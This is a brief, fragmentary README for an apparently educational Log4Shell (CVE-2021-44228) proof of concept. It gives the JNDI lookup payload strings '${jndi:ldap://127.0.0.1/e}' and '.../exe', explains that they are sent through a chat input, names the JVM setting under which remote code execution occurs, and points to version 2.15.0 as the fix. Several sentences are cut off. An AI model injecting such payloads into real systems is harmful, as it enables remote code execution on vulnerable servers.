Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information
This is a proof of concept of the log4j rce.
Here are some links for the CVE-2021-44228:
This bug affects nearly all log4j2 and maybe log4j1 versions. The recommended version to use is 2.15.0 which fixes the exploit.
${jndi:ldap://127.0.0.1/e}
in the chat. If there is an open socket on port 389
logj4 tries to connect and blocks further communiction until a timeout occurs.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!
which is a serialized string object from the ldap server.${jndi:ldap://127.0.0.1/exe}
in the chat. If -Dcom.sun.jndi.ldap.object.trustURLCodebase=true
is set to true the remote code execution will happen.This project is only for educational purposes.